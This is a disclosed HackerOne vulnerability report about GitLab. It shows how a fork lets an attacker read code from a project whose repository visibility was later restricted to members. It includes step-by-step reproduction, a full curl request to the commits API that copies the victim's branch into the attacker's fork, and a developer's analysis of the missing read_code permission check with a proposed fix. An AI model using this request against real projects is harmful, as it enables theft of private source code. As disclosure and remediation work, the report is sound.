Leaking source code of restricted project through a fork
HackerOne report #2027967 by shells3c
on 2023-06-15, assigned to @ottilia_westerlund:
Report
Summary
The codebase of any project that has Repository visibility set to Only Project Members can be leaked if it has a fork out there
Steps to reproduce
- Victim account creates a public project
- Attacker account forks this project
- Victim account sets the Repository visibility of the project to Only Project Members, and then creates a file, let's say
secret.txt
with some secret inside it - As the attacker, execute this command
curl --request POST \
--form "start_project=<victim_project_id>" \
--form "branch=steal" \
--form "commit_message=some commit message" \
--form "start_branch=<victim_project_branch>" \
--form "actions[][action]=create" \
--form "actions[][file_path]=foo" \
--form "actions[][content]=bar" \
--header "PRIVATE-TOKEN: <attacker_access_token>" \
"https://gitlab.com/api/v4/projects/<attacker_project_id>/repository/commits"
with:
-
<attacker_access_token>
is the access token of the attacker account -
<attacker_project_id>
is the project ID or URL-encoded path of the attacker project, which is the fork -
<victim_project_id>
is the project ID or URL-encoded path of the victim project -
<victim_project_branch>
is the branch that you want to steal the code from. In this test, you can usemain
- Attacker account visits the fork, switches to branch
steal
to readsecret.txt
Output of checks
This bug happens on GitLab.com
Impact
Disclosure of restricted project's source code by using a fork
@vyaklushin)
Investigation (byHere we verify that the user has an access to the project, but we don't check if the user has access to the code.
We do read_project
check -> which is successful, but we don't do a read_code
check that necessary to ensure if the code is accessible.
A validation like this one should help.
can?(current_user, :read_code, start_project)
We should also check user permissions in Files::MultiService
to prevent this bug from appearing again.
How To Reproduce
Please add reproducibility information to this section: